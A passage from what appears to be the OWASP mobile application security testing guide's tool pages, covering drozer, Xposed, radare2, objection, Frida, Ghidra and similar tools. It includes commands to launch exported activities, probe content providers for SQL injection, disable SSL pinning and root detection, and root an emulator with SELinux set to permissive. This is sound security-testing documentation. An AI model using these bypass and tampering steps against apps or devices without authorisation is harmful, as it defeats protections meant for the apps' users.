Again, without drozer this would have required several steps. The module app.package.attacksurface
lists activities, broadcast receivers, content providers and services that are exported, hence, they are public and can be accessed through other apps. Once we have identified our attack surface, we can interact with the IPC endpoints through drozer without having to write a separate standalone app as it would be required for certain tasks such as communicating with a content provider.
For example, if the app has an exported Activity that leaks sensitive information we can invoke it with the Drozer module app.activity.start
:
dz> run app.activity.start --component <package> <component name>\n
This previous command will start the activity, hopefully leaking some sensitive information. Drozer has modules for every type of IPC mechanism. Download InsecureBankv2 if you would like to try the modules with an intentionally vulnerable application that illustrates common problems related to IPC endpoints. Pay close attention to the modules in the scanner category as they are very helpful for automatically detecting vulnerabilities even in system packages, especially if you are using a ROM provided by your cellphone company. Even SQL injection vulnerabilities in system packages by Google have been identified in the past with drozer.
"},{"location":"MASTG/tools/android/MASTG-TOOL-0015/#other-drozer-commands","title":"Other Drozer commands","text":"Here's a non-exhaustive list of commands you can use to start exploring on Android:
# List all the installed packages\n$ dz> run app.package.list\n\n# Find the package name of a specific app\n$ dz> run app.package.list -f (string to be searched)\n\n# See basic information\n$ dz> run app.package.info -a (package name)\n\n# Identify the exported application components\n$ dz> run app.package.attacksurface (package name)\n\n# Identify the list of exported Activities\n$ dz> run app.activity.info -a (package name)\n\n# Launch the exported Activities\n$ dz> run app.activity.start --component (package name) (component name)\n\n# Identify the list of exported Broadcast receivers\n$ dz> run app.broadcast.info -a (package name)\n\n# Send a message to a Broadcast receiver\n$ dz> run app.broadcast.send --action (broadcast receiver name) -- extra (number of arguments)\n\n# Detect SQL injections in content providers\n$ dz> run scanner.provider.injection -a (package name)\n
"},{"location":"MASTG/tools/android/MASTG-TOOL-0015/#other-drozer-resources","title":"Other Drozer resources","text":"Other resources where you might find useful information are:
gplaycli is a Python based CLI tool to search, install and update Android applications from the Google Play Store. Follow the installation steps and you're ready to run it. gplaycli offers several options, please refer to its help (-h
) for more information.
If you're unsure about the package name (or AppID) of an app, you may perform a keyword based search for APKs (-s
):
$ gplaycli -s \"google keep\"\n\nTitle Creator Size Last Update AppID Version\n\nGoogle Keep - notes and lists Google LLC 15.78MB 4 Sep 2019 com.google.android.keep 193510330\nMaps - Navigate & Explore Google LLC 35.25MB 16 May 2019 com.google.android.apps.maps 1016200134\nGoogle Google LLC 82.57MB 30 Aug 2019 com.google.android.googlequicksearchbox 301008048\n
Note that regional (Google Play) restrictions apply when using gplaycli. In order to access apps that are restricted in your country you can use alternative app stores such as the ones described in \"Alternative App Stores\".
"},{"location":"MASTG/tools/android/MASTG-TOOL-0017/","title":"House","text":"House is a runtime mobile application analysis toolkit for Android apps, developed and maintained by the NCC Group and is written in Python.
It's leveraging a running Frida server on a rooted device or the Frida gadget in a repackaged Android app. The intention of House is to allow an easy way of prototyping Frida scripts via its convenient web GUI.
The installation instructions and \"how-to guide\" of House can be found in the Readme of the Github repo.
"},{"location":"MASTG/tools/android/MASTG-TOOL-0018/","title":"jadx","text":"jadx (Dex to Java Decompiler) is a command line and GUI tool for producing Java source code from Android DEX and APK files - https://github.com/skylot/jadx
"},{"location":"MASTG/tools/android/MASTG-TOOL-0019/","title":"jdb","text":"A Java Debugger which allows you to set breakpoints and print application variables. jdb uses the JDWP protocol - https://docs.oracle.com/javase/7/docs/technotes/tools/windows/jdb.html
"},{"location":"MASTG/tools/android/MASTG-TOOL-0020/","title":"JustTrustMe","text":"An Xposed Module to bypass SSL certificate pinning - https://github.com/Fuzion24/JustTrustMe
"},{"location":"MASTG/tools/android/MASTG-TOOL-0021/","title":"Magisk","text":"Magisk
(\"Magic Mask\") is one way to root your Android device. Its specialty lies in the way the modifications on the system are performed. While other rooting tools alter the actual data on the system partition, Magisk does not (which is called \"systemless\"). This enables a way to hide the modifications from root-sensitive applications (e.g. for banking or games) and allows using the official Android OTA upgrades without the need to unroot the device beforehand.
You can get familiar with Magisk reading the official documentation on GitHub. If you don't have Magisk installed, you can find installation instructions in the documentation. If you use an official Android version and plan to upgrade it, Magisk provides a tutorial on GitHub.
Learn more about rooting your device with Magisk.
"},{"location":"MASTG/tools/android/MASTG-TOOL-0022/","title":"Proguard","text":"ProGuard is a free Java class file shrinker, optimizer, obfuscator, and preverifier. It detects and removes unused classes, fields, methods, and attributes and can also be used to delete logging-related code.
"},{"location":"MASTG/tools/android/MASTG-TOOL-0023/","title":"RootCloak Plus","text":"A Cydia Substrate Module used to check for commonly known indications of root - https://github.com/devadvance/rootcloakplus
"},{"location":"MASTG/tools/android/MASTG-TOOL-0024/","title":"Scrcpy","text":"Scrcpy provides display and control of Android devices connected over USB (or TCP/IP). It does not require any root access and it works on GNU/Linux, Windows and macOS.
"},{"location":"MASTG/tools/android/MASTG-TOOL-0025/","title":"SSLUnpinning","text":"An Xposed Module to bypass SSL certificate pinning - https://github.com/ac-pm/SSLUnpinning_Xposed
"},{"location":"MASTG/tools/android/MASTG-TOOL-0026/","title":"Termux","text":"Termux is a terminal emulator for Android that provides a Linux environment that works directly with or without rooting and with no setup required. The installation of additional packages is a trivial task thanks to its own APT package manager (which makes a difference in comparison to other terminal emulator apps). You can search for specific packages by using the command pkg search <pkg_name>
and install packages with pkg install <pkg_name>
. You can install Termux straight from Google Play.
Xposed does not work on Android 9 (API level 28). However, it was unofficially ported in 2019 under the name EdXposed, supporting Android 8-10 (API level 26 till 29). You can find the code and usage examples at EdXposed Github repo.
Xposed is a framework that allows you to modify the system or application aspect and behavior at runtime, without modifying any Android application package (APK) or re-flashing. Technically, it is an extended version of Zygote that exports APIs for running Java code when a new process is started. Running Java code in the context of the newly instantiated app makes it possible to resolve, hook, and override Java methods belonging to the app. Xposed uses reflection to examine and modify the running app. Changes are applied in memory and persist only during the process' runtime since the application binaries are not modified.
To use Xposed, you need to first install the Xposed framework on a rooted device as explained on XDA-Developers Xposed framework hub. Modules can be installed through the Xposed Installer app, and they can be toggled on and off through the GUI.
Note: given that a plain installation of the Xposed framework is easily detected with SafetyNet, we recommend using Magisk to install Xposed. This way, applications with SafetyNet attestation should have a higher chance of being testable with Xposed modules.
Xposed has been compared to Frida. When you run Frida server on a rooted device, you will end up with a similarly effective setup. Both frameworks deliver a lot of value when you want to do dynamic instrumentation. When Frida crashes the app, you can try something similar with Xposed. Next, similar to the abundance of Frida scripts, you can easily use one of the many modules that come with Xposed, such as the earlier discussed module to bypass SSL pinning (JustTrustMe and SSLUnpinning). Xposed includes other modules, such as Inspeckage which allows you to do more in-depth application testing as well. On top of that, you can create your own modules as well to patch often used security mechanisms of Android applications.
Xposed can also be installed on an emulator through the following script:
#!/bin/sh\necho \"Start your emulator with 'emulator -avd NAMEOFX86A8.0 -writable-system -selinux permissive -wipe-data'\"\nadb root && adb remount\nadb install SuperSU\\ v2.79.apk #binary can be downloaded from http://www.supersu.com/download\nadb push root_avd-master/SuperSU/x86/su /system/xbin/su\nadb shell chmod 0755 /system/xbin/su\nadb shell setenforce 0\nadb shell su --install\nadb shell su --daemon&\nadb push busybox /data/busybox #binary can be downloaded from https://busybox.net/\n# adb shell \"mount -o remount,rw /system && mv /data/busybox /system/bin/busybox && chmod 755 /system/bin/busybox && /system/bin/busybox --install /system/bin\"\nadb shell chmod 755 /data/busybox\nadb shell 'sh -c \"./data/busybox --install /data\"'\nadb shell 'sh -c \"mkdir /data/xposed\"'\nadb push xposed8.zip /data/xposed/xposed.zip #can be downloaded from https://dl-xda.xposed.info/framework/\nadb shell chmod 0755 /data/xposed\nadb shell 'sh -c \"./data/unzip /data/xposed/xposed.zip -d /data/xposed/\"'\nadb shell 'sh -c \"cp /data/xposed/xposed/META-INF/com/google/android/*.* /data/xposed/xposed/\"'\necho \"Now adb shell and do 'su', next: go to ./data/xposed/xposed, make flash-script.sh executable and run it in that directory after running SUperSU\"\necho \"Next, restart emulator\"\necho \"Next, adb install XposedInstaller_3.1.5.apk\"\necho \"Next, run installer and then adb reboot\"\necho \"Want to use it again? Start your emulator with 'emulator -avd NAMEOFX86A8.0 -writable-system -selinux permissive'\"\n
"},{"location":"MASTG/tools/android/MASTG-TOOL-0028/","title":"radare2 for Android","text":"radare2 (r2) is a popular open source reverse engineering framework for disassembling, debugging, patching and analyzing binaries that is scriptable and supports many architectures and file formats including Android and iOS apps. For Android, Dalvik DEX (odex, multidex), ELF (executables, .so, ART) and Java (JNI and Java classes) are supported. It also contains several useful scripts that can help you during mobile application analysis as it offers low level disassembling and safe static analysis that comes in handy when traditional tools fail.
radare2 implements a rich command line interface (CLI) where you can perform the mentioned tasks. However, if you're not really comfortable using the CLI for reverse engineering you may want to consider using the Web UI (via the -H
flag) or the even more convenient Qt and C++ GUI version called iaito. Do keep in mind that the CLI, and more concretely its Visual Mode and its scripting capabilities (r2pipe), are the core of radare2's power and it's definitely worth learning how to use it.
Please refer to radare2's official installation instructions. We highly recommend always installing radare2 from the GitHub version instead of via common package managers such as APT. Radare2 is in very active development, which means that third party repositories are often outdated.
"},{"location":"MASTG/tools/android/MASTG-TOOL-0028/#using-radare2","title":"Using radare2","text":"The radare2 framework comprises a set of small utilities that can be used from the r2 shell or independently as CLI tools. These utilities include rabin2
, rasm2
, rahash2
, radiff2
, rafind2
, ragg2
, rarun2
, rax2
, and of course r2
, which is the main one.
For example, you can use rafind2
to read strings directly from an encoded Android Manifest (AndroidManifest.xml):
# Permissions\n$ rafind2 -ZS permission AndroidManifest.xml\n# Activities\n$ rafind2 -ZS activity AndroidManifest.xml\n# Content providers\n$ rafind2 -ZS provider AndroidManifest.xml\n# Services\n$ rafind2 -ZS service AndroidManifest.xml\n# Receivers\n$ rafind2 -ZS receiver AndroidManifest.xml\n
Or use rabin2
to get information about a binary file:
$ rabin2 -I UnCrackable-Level1/classes.dex\narch dalvik\nbaddr 0x0\nbinsz 5528\nbintype class\nbits 32\ncanary false\nretguard false\nclass 035\ncrypto false\nendian little\nhavecode true\nladdr 0x0\nlang dalvik\nlinenum false\nlsyms false\nmachine Dalvik VM\nmaxopsz 16\nminopsz 1\nnx false\nos linux\npcalign 0\npic false\nrelocs false\nsanitiz false\nstatic true\nstripped false\nsubsys java\nva true\nsha1 12-5508c b7fafe72cb521450c4470043caa332da61d1bec7\nadler32 12-5528c 00000000\n
Type rabin2 -h
to see all options:
$ rabin2 -h\nUsage: rabin2 [-AcdeEghHiIjlLMqrRsSUvVxzZ] [-@ at] [-a arch] [-b bits] [-B addr]\n [-C F:C:D] [-f str] [-m addr] [-n str] [-N m:M] [-P[-P] pdb]\n [-o str] [-O str] [-k query] [-D lang symname] file\n -@ [addr] show section, symbol or import at addr\n -A list sub-binaries and their arch-bits pairs\n -a [arch] set arch (x86, arm, .. or <arch>_<bits>)\n -b [bits] set bits (32, 64 ...)\n -B [addr] override base address (pie bins)\n -c list classes\n -cc list classes in header format\n -H header fields\n -i imports (symbols imported from libraries)\n -I binary info\n -j output in json\n ...\n
Use the main r2
utility to access the r2 shell. You can load DEX binaries just like any other binary:
r2 classes.dex\n
Enter r2 -h
to see all available options. A very commonly used flag is -A
, which triggers an analysis after loading the target binary. However, this should be used sparingly and with small binaries as it is very time and resource consuming. You can learn more about this in the chapter \"Tampering and Reverse Engineering on Android\".
Once in the r2 shell, you can also access functions offered by the other radare2 utilities. For example, running i
will print the information of the binary, exactly as rabin2 -I
does.
To print all the strings use rabin2 -Z
or the command iz
(or the less verbose izq
) from the r2 shell.
[0x000009c8]> izq\n0xc50 39 39 /dev/com.koushikdutta.superuser.daemon/\n0xc79 25 25 /system/app/Superuser.apk\n...\n0xd23 44 44 5UJiFctbmgbDoLXmpL12mkno8HT4Lv8dlat8FxR2GOc=\n0xd51 32 32 8d127684cbc37c17616d806cf50473cc\n0xd76 6 6 <init>\n0xd83 10 10 AES error:\n0xd8f 20 20 AES/ECB/PKCS7Padding\n0xda5 18 18 App is debuggable!\n0xdc0 9 9 CodeCheck\n0x11ac 7 7 Nope...\n0x11bf 14 14 Root detected!\n
Most of the time you can append special options to your commands such as q
to make the command less verbose (quiet) or j
to give the output in JSON format (use ~{}
to prettify the JSON string).
[0x000009c8]> izj~{}\n[\n {\n \"vaddr\": 3152,\n \"paddr\": 3152,\n \"ordinal\": 1,\n \"size\": 39,\n \"length\": 39,\n \"section\": \"file\",\n \"type\": \"ascii\",\n \"string\": \"L2Rldi9jb20ua291c2hpa2R1dHRhLnN1cGVydXNlci5kYWVtb24v\"\n },\n {\n \"vaddr\": 3193,\n \"paddr\": 3193,\n \"ordinal\": 2,\n \"size\": 25,\n \"length\": 25,\n \"section\": \"file\",\n \"type\": \"ascii\",\n \"string\": \"L3N5c3RlbS9hcHAvU3VwZXJ1c2VyLmFwaw==\"\n },\n
You can print the class names and their methods with the r2 command ic
(information classes).
[0x000009c8]> ic\n...\n0x0000073c [0x00000958 - 0x00000abc] 356 class 5 Lsg/vantagepoint/uncrackable1/MainActivity\n:: Landroid/app/Activity;\n0x00000958 method 0 pC Lsg/vantagepoint/uncrackable1/MainActivity.method.<init>()V\n0x00000970 method 1 P Lsg/vantagepoint/uncrackable1/MainActivity.method.a(Ljava/lang/String;)V\n0x000009c8 method 2 r Lsg/vantagepoint/uncrackable1/MainActivity.method.onCreate (Landroid/os/Bundle;)V\n0x00000a38 method 3 p Lsg/vantagepoint/uncrackable1/MainActivity.method.verify (Landroid/view/View;)V\n0x0000075c [0x00000acc - 0x00000bb2] 230 class 6 Lsg/vantagepoint/uncrackable1/a :: Ljava/lang/Object;\n0x00000acc method 0 sp Lsg/vantagepoint/uncrackable1/a.method.a(Ljava/lang/String;)Z\n0x00000b5c method 1 sp Lsg/vantagepoint/uncrackable1/a.method.b(Ljava/lang/String;)[B\n
You can print the imported methods with the r2 command ii
(information imports).
[0x000009c8]> ii\n[Imports]\nNum Vaddr Bind Type Name\n...\n 29 0x000005cc NONE FUNC Ljava/lang/StringBuilder.method.append(Ljava/lang/String;) Ljava/lang/StringBuilder;\n 30 0x000005d4 NONE FUNC Ljava/lang/StringBuilder.method.toString()Ljava/lang/String;\n 31 0x000005dc NONE FUNC Ljava/lang/System.method.exit(I)V\n 32 0x000005e4 NONE FUNC Ljava/lang/System.method.getenv(Ljava/lang/String;)Ljava/lang/String;\n 33 0x000005ec NONE FUNC Ljavax/crypto/Cipher.method.doFinal([B)[B\n 34 0x000005f4 NONE FUNC Ljavax/crypto/Cipher.method.getInstance(Ljava/lang/String;) Ljavax/crypto/Cipher;\n 35 0x000005fc NONE FUNC Ljavax/crypto/Cipher.method.init(ILjava/security/Key;)V\n 36 0x00000604 NONE FUNC Ljavax/crypto/spec/SecretKeySpec.method.<init>([BLjava/lang/String;)V\n
A common approach when inspecting a binary is to search for something, navigate to it and visualize it in order to interpret the code. One of the ways to find something using radare2 is by filtering the output of specific commands, i.e. to grep them using ~
plus a keyword (~+
for case-insensitive). For example, we might know that the app is verifying something, we can inspect all radare2 flags and see where we find something related to \"verify\".
When loading a file, radare2 tags everything it's able to find. These tagged names or references are called flags. You can access them via the command f
.
In this case we will grep the flags using the keyword \"verify\":
[0x000009c8]> f~+verify\n0x00000a38 132 sym.Lsg_vantagepoint_uncrackable1_MainActivity.method. \\\nverify_Landroid_view_View__V\n0x00000a38 132 method.public.Lsg_vantagepoint_uncrackable1_MainActivity. \\\nLsg_vantagepoint_uncrackable1\n _MainActivity.method.verify_Landroid_view_View__V\n0x00001400 6 str.verify\n
It seems that we've found one method in 0x00000a38 (that was tagged two times) and one string in 0x00001400. Let's navigate (seek) to that method by using its flag:
[0x000009c8]> s sym.Lsg_vantagepoint_uncrackable1_MainActivity.method. \\\nverify_Landroid_view_View__V\n
And of course you can also use the disassembler capabilities of r2 and print the disassembly with the command pd
(or pdf
if you know you're already located in a function).
[0x00000a38]> pd\n
r2 commands normally accept options (see pd?
), e.g. you can limit the opcodes displayed by appending a number (\"N\") to the command pd N
.
Instead of just printing the disassembly to the console you may want to enter the so-called Visual Mode by typing V
.
By default, you will see the hexadecimal view. By typing p
you can switch to different views, such as the disassembly view:
Radare2 offers a Graph Mode that is very useful to follow the flow of the code. You can access it from the Visual Mode by typing V
:
This is only a selection of some radare2 commands to start getting some basic information from Android binaries. Radare2 is very powerful and has dozens of commands that you can find on the radare2 command documentation. Radare2 will be used throughout the guide for different purposes such as reversing code, debugging or performing binary analysis. We will also use it in combination with other frameworks, especially Frida (see the r2frida section for more information).
Please refer to the chapter \"Tampering and Reverse Engineering on Android\" for more detailed use of radare2 on Android, especially when analyzing native libraries. You may also want to read the official radare2 book.
"},{"location":"MASTG/tools/android/MASTG-TOOL-0029/","title":"objection for Android","text":"Objection offers several features specific to Android. You can find the full list of features on the project's page, but here are a few interesting ones:
If you have a rooted device with frida-server installed, Objection can connect directly to the running Frida server to provide all its functionality without needing to repackage the application. However, it is not always possible to root an Android device or the app may contain advanced RASP controls for root detection, so injecting a frida-gadget may be the easiest way to bypass those controls.
The ability to perform advanced dynamic analysis on non-rooted devices is one of the features that makes Objection incredibly useful. After following the repackaging process you will be able to run all the aforementioned commands which make it very easy to quickly analyze an application, or bypass basic security controls.
"},{"location":"MASTG/tools/android/MASTG-TOOL-0029/#using-objection-on-android","title":"Using Objection on Android","text":"Starting up Objection depends on whether you've patched the APK or whether you are using a rooted device running Frida-server. For running a patched APK, objection will automatically find any attached devices and search for a listening Frida gadget. However, when using frida-server, you need to explicitly tell frida-server which application you want to analyze.
# Connecting to a patched APK\nobjection explore\n\n# Find the correct name using frida-ps\n$ frida-ps -Ua | grep -i telegram\n30268 Telegram org.telegram.messenger\n\n# Connecting to the Telegram app through Frida-server\n$ objection --gadget=\"org.telegram.messenger\" explore\n
Once you are in the Objection REPL, you can execute any of the available commands. Below is an overview of some of the most useful ones:
# Show the different storage locations belonging to the app\n$ env\n\n# Disable popular ssl pinning methods\n$ android sslpinning disable\n\n# List items in the keystore\n$ android keystore list\n\n# Try to circumvent root detection\n$ android root disable\n
More information on using the Objection REPL can be found on the Objection Wiki
"},{"location":"MASTG/tools/android/MASTG-TOOL-0030/","title":"Angr","text":"Angr is a Python framework for analyzing binaries. It is useful for both static and dynamic symbolic (\"concolic\") analysis. In other words: given a binary and a requested state, Angr will try to get to that state, using formal methods (a technique used for static code analysis) to find a path, as well as brute forcing. Using angr to get to the requested state is often much faster than taking manual steps for debugging and searching the path towards the required state. Angr operates on the VEX intermediate language and comes with a loader for ELF/ARM binaries, so it is perfect for dealing with native code, such as native Android binaries.
Angr allows for disassembly, program instrumentation, symbolic execution, control-flow analysis, data-dependency analysis, decompilation and more, given a large set of plugins.
Since version 8, Angr is based on Python 3, and can be installed with pip on *nix operating systems, macOS and Windows:
pip install angr\n
Some of angr's dependencies contain forked versions of the Python modules Z3 and PyVEX, which would overwrite the original versions. If you're using those modules for anything else, you should create a dedicated virtual environment with Virtualenv. Alternatively, you can always use the provided docker container. See the installation guide for more details.
Comprehensive documentation, including an installation guide, tutorials, and usage examples are available on Angr's Gitbooks page. A complete API reference is also available.
You can use angr from a Python REPL - such as iPython - or script your approaches. Although angr has a bit of a steep learning curve, we do recommend using it when you want to brute force your way to a given state of an executable. Please see the \"Symbolic Execution\" section of the \"Reverse Engineering and Tampering\" chapter as a great example on how this can work.
"},{"location":"MASTG/tools/android/MASTG-TOOL-0099/","title":"FlowDroid","text":"FlowDroid is an open-source tool based on Soot, a framework dedicated to analyzing and translating Java bytecode for easier analysis. The tool handles the nuances of Android app lifecycles (like onCreate
, onStart
, onPause
, and others) and its UI components during analysis and performs taint analysis that is:
FlowDroid can be used in two ways: as a standalone command line tool for quick analyses or as a library for more complex investigations. In addition to performing taint analysis, FlowDroid can also generate call graphs, as illustrated in this blog post.
"},{"location":"MASTG/tools/generic/MASTG-TOOL-0031/","title":"Frida","text":"Frida is a free and open source dynamic code instrumentation toolkit written by Ole Andr\u00e9 Vadla Ravn\u00e5s that works by injecting the QuickJS JavaScript engine (previously Duktape and V8) into the instrumented process. Frida lets you execute snippets of JavaScript into native apps on Android and iOS (as well as on other platforms).
To install Frida locally, simply run:
pip install frida-tools\n
Or refer to the installation page for more details.
Code can be injected in several ways. For example, Xposed permanently modifies the Android app loader, providing hooks for running your own code every time a new process is started. In contrast, Frida implements code injection by writing code directly into the process memory. When attached to a running app:
frida-agent.so
).Frida offers three modes of operation:
LD_PRELOAD
or DYLD_INSERT_LIBRARIES
. You can configure the frida-gadget to run autonomously and load a script from the filesystem (e.g. path relative to where the Gadget binary resides).Independently of the chosen mode, you can make use of the Frida JavaScript APIs to interact with the running process and its memory. Some of the fundamental APIs are:
Frida also provides a couple of simple tools built on top of the Frida API and available right from your terminal after installing frida-tools via pip. For instance:
frida
) for quick script prototyping and try/error scenarios.frida-ps
to obtain a list of all apps (or processes) running on the device including their names, identifiers and PIDs.frida-ls-devices
to list your connected devices running Frida servers or agents.frida-trace
to quickly trace methods that are part of an iOS app or that are implemented inside an Android native library.In addition, you'll also find several open source Frida-based tools, such as:
We will be using all of these tools throughout the guide.
You can use these tools as-is, tweak them to your needs, or take as excellent examples on how to use the APIs. Having them as an example is very helpful when you write your own hooking scripts or when you build introspection tools to support your reverse engineering workflow.
"},{"location":"MASTG/tools/generic/MASTG-TOOL-0032/","title":"Frida CodeShare","text":"Frida CodeShare is a repository containing a collection of ready-to-run Frida scripts which can enormously help when performing concrete tasks on both Android and iOS, as well as serve as inspiration to build your own scripts. Two representative examples are:
Using them is as simple as including the --codeshare <handler>
flag and a handler when using the Frida CLI. For example, to use \"ObjC method observer\", enter the following:
frida --codeshare mrmacete/objc-method-observer -f YOUR_BINARY\n
"},{"location":"MASTG/tools/generic/MASTG-TOOL-0033/","title":"Ghidra","text":"Ghidra is an open source software reverse engineering (SRE) suite of tools developed by the United States of America's National Security Agency's (NSA) Research Directorate. Ghidra is a versatile tool which comprises a disassembler, decompiler and a built-in scripting engine for advanced usage. Please refer to the installation guide on how to install it and also look at the cheat sheet for a first overview of available commands and shortcuts. In this section, we will have a walk-through on how to create a project, view disassembly and decompiled code for a binary.
Start Ghidra using ghidraRun
(*nix) or ghidraRun.bat
(Windows), depending on the platform you are on. Once Ghidra is fired up, create a new project by specifying the project directory. You will be greeted by a window as shown below:
In your new Active Project you can import an app binary by going to File -> Import File and choosing the desired file.
If the file can be properly processed, Ghidra will show meta-information about the binary before starting the analysis.
To get the disassembled code for the binary file chosen above, double click the imported file from the Active Project window. Click yes and analyze for auto-analysis on the subsequent windows. Auto-analysis will take some time depending on the size of the binary, the progress can be tracked in the bottom right corner of the code browser window. Once auto-analysis is completed you can start exploring the binary.
The most important windows to explore a binary in Ghidra are the Listing (Disassembly) window, the Symbol Tree window and the Decompiler window, which shows the decompiled version of the function selected for disassembly. The Display Function Graph option shows control flow graph of the selected function.
There are many other functionalities available in Ghidra and most of them can be explored by opening the Window menu. For example, if you want to examine the strings present in the binary, open the Defined Strings option. We will discuss other advanced functionalities while analyzing various binaries for Android and iOS platforms in the coming chapters.
"},{"location":"MASTG/tools/generic/MASTG-TOOL-0034/","title":"LIEF","text":"The purpose of LIEF is to provide a cross platform library to parse, modify and abstract ELF, PE and MachO formats. With it you can, for instance, inject a certain library as a dependency of a native library, which an application already loads by default. - https://lief.quarkslab.com/
"},{"location":"MASTG/tools/generic/MASTG-TOOL-0035/","title":"MobSF","text":"MobSF (Mobile Security Framework) is an automated, all-in-one mobile application pentesting framework capable of performing static and dynamic analysis. The easiest way of getting MobSF started is via Docker.
docker pull opensecurity/mobile-security-framework-mobsf\ndocker run -it -p 8000:8000 opensecurity/mobile-security-framework-mobsf:latest\n
Or install and start it locally on your host computer by running:
# Setup\ngit clone https://github.com/MobSF/Mobile-Security-Framework-MobSF.git\ncd Mobile-Security-Framework-MobSF\n./setup.sh # For Linux and Mac\nsetup.bat # For Windows\n\n# Installation process\n./run.sh # For Linux and Mac\nrun.bat # For Windows\n
Once you have MobSF up and running you can open it in your browser by navigating to http://127.0.0.1:8000. Simply drag the APK you want to analyze into the upload area and MobSF will start its job.
"},{"location":"MASTG/tools/generic/MASTG-TOOL-0036/","title":"r2frida","text":"r2frida is a project that allows radare2 to connect to Frida, effectively merging the powerful reverse engineering capabilities of radare2 with the dynamic instrumentation toolkit of Frida. r2frida can be used on both Android and iOS, allowing you to:
Please refer to r2frida's official installation instructions.
With frida-server running, you should now be able to attach to it using the pid, spawn path, host and port, or device-id. For example, to attach to PID 1234:
r2 frida://1234\n
For more examples on how to connect to frida-server, see the usage section in the r2frida's README page.
The following examples were executed using an Android app but also apply to iOS apps.
Once in the r2frida session, all commands start with :
or =!
. For example, in radare2 you'd run i
to display the binary information, but in r2frida you'd use :i
.
See all options with r2 frida://?
.
[0x00000000]> :i\narch x86\nbits 64\nos linux\npid 2218\nuid 1000\nobjc false\nruntime V8\njava false\ncylang false\npageSize 4096\npointerSize 8\ncodeSigningPolicy optional\nisDebuggerAttached false\n
To search in memory for a specific keyword, you may use the search command \\/
:
[0x00000000]> \\/ unacceptable\nSearching 12 bytes: 75 6e 61 63 63 65 70 74 61 62 6c 65\nSearching 12 bytes in [0x0000561f05ebf000-0x0000561f05eca000]\n...\nSearching 12 bytes in [0xffffffffff600000-0xffffffffff601000]\nhits: 23\n0x561f072d89ee hit12_0 unacceptable policyunsupported md algorithmvar bad valuec\n0x561f0732a91a hit12_1 unacceptableSearching 12 bytes: 75 6e 61 63 63 65 70 74 61\n
To output the search results in JSON format, we simply add j
to our previous search command (just as we do in the r2 shell). This can be used in most of the commands:
[0x00000000]> \\/j unacceptable\nSearching 12 bytes: 75 6e 61 63 63 65 70 74 61 62 6c 65\nSearching 12 bytes in [0x0000561f05ebf000-0x0000561f05eca000]\n...\nSearching 12 bytes in [0xffffffffff600000-0xffffffffff601000]\nhits: 23\n{\"address\":\"0x561f072c4223\",\"size\":12,\"flag\":\"hit14_1\",\"content\":\"unacceptable \\\npolicyunsupported md algorithmvar bad valuec0\"},{\"address\":\"0x561f072c4275\", \\\n\"size\":12,\"flag\":\"hit14_2\",\"content\":\"unacceptableSearching 12 bytes: 75 6e 61 \\\n63 63 65 70 74 61\"},{\"address\":\"0x561f072c42c8\",\"size\":12,\"flag\":\"hit14_3\", \\\n\"content\":\"unacceptableSearching 12 bytes: 75 6e 61 63 63 65 70 74 61 \"},\n...\n
To list the loaded libraries use the command :il
and filter the results using the internal grep from radare2 with the command ~
. For example, the following command will list the loaded libraries matching the keywords keystore
, ssl
and crypto
:
[0x00000000]> :il~keystore,ssl,crypto\n0x00007f3357b8e000 libssl.so.1.1\n0x00007f3357716000 libcrypto.so.1.1\n
Similarly, to list the exports and filter the results by a specific keyword:
[0x00000000]> :iE libssl.so.1.1~CIPHER\n0x7f3357bb7ef0 f SSL_CIPHER_get_bits\n0x7f3357bb8260 f SSL_CIPHER_find\n0x7f3357bb82c0 f SSL_CIPHER_get_digest_nid\n0x7f3357bb8380 f SSL_CIPHER_is_aead\n0x7f3357bb8270 f SSL_CIPHER_get_cipher_nid\n0x7f3357bb7ed0 f SSL_CIPHER_get_name\n0x7f3357bb8340 f SSL_CIPHER_get_auth_nid\n0x7f3357bb7930 f SSL_CIPHER_description\n0x7f3357bb8300 f SSL_CIPHER_get_kx_nid\n0x7f3357bb7ea0 f SSL_CIPHER_get_version\n0x7f3357bb7f10 f SSL_CIPHER_get_id\n
To list or set a breakpoint use the command db. This is useful when analyzing/modifying memory:
[0x00000000]> :db\n
Finally, remember that you can also run Frida JavaScript code with \\.
plus the name of the script:
[0x00000000]> \\. agent.js\n
You can find more examples on how to use r2frida on their Wiki project.
"},{"location":"MASTG/tools/generic/MASTG-TOOL-0037/","title":"RMS Runtime Mobile Security","text":"RMS - Runtime Mobile Security is a runtime mobile application analysis toolkit, supporting Android and iOS Apps. It offers a web GUI and is written in Python.
It's leveraging a running Frida server on a jailbroken device with the following out-of-box functionalities:
The installation instructions and \"how-to guide\" of RMS can be found in the Readme of the Github repo.
"},{"location":"MASTG/tools/generic/MASTG-TOOL-0038/","title":"objection","text":"Objection is a \"runtime mobile exploration toolkit, powered by Frida\". Its main goal is to allow security testing on non-rooted devices through an intuitive interface.
Objection achieves this goal by providing you with the tools to easily inject the Frida gadget into an application by repackaging it. This way, you can deploy the repackaged app to the non-rooted/non-jailbroken device by sideloading it. Objection also provides a REPL that allows you to interact with the application, giving you the ability to perform any action that the application can perform.
Objection can be installed through pip as described on Objection's Wiki.
pip3 install objection\n
"},{"location":"MASTG/tools/generic/MASTG-TOOL-0098/","title":"iaito","text":"Iaito is the official graphical user interface for radare2, an open-source reverse engineering framework. This user-friendly tool simplifies the reverse engineering process by providing a graphical interface that integrates seamlessly with radare2's powerful features. With a focus on simplicity, keybindings, and radare2-style workflows, Iaito is a valuable resource for both experienced reverse engineers and those new to the field, offering a more accessible and efficient way to work with radare2.
"},{"location":"MASTG/tools/ios/MASTG-TOOL-0039/","title":"Frida for iOS","text":"Frida supports interaction with the Objective-C runtime through the ObjC API. You'll be able to hook and call both Objective-C and native functions inside the process and its native libraries. Your JavaScript snippets have full access to memory, e.g. to read and/or write any structured data.
Here are some tasks that the Frida APIs offer and that are relevant or exclusive to iOS:
Remember that on iOS, you can also benefit from the built-in tools provided when installing Frida, which include the Frida CLI (frida
), frida-ps
, frida-ls-devices
and frida-trace
, to name a few.
There's a frida-trace
feature exclusive on iOS worth highlighting: tracing Objective-C APIs using the -m
flag and wildcards. For example, tracing all methods including \"HTTP\" in their name and belonging to any class whose name starts with \"NSURL\" is as easy as running:
frida-trace -U YourApp -m \"*[NSURL* *HTTP*]\"\n
For a quick start you can go through the iOS examples.
"},{"location":"MASTG/tools/ios/MASTG-TOOL-0039/#installing-frida-on-ios","title":"Installing Frida on iOS","text":"To connect Frida to an iOS app, you need a way to inject the Frida runtime into that app. This is easy to do on a jailbroken device: just install frida-server
through Cydia. Once it has been installed, the Frida server will automatically run with root privileges, allowing you to easily inject code into any process.
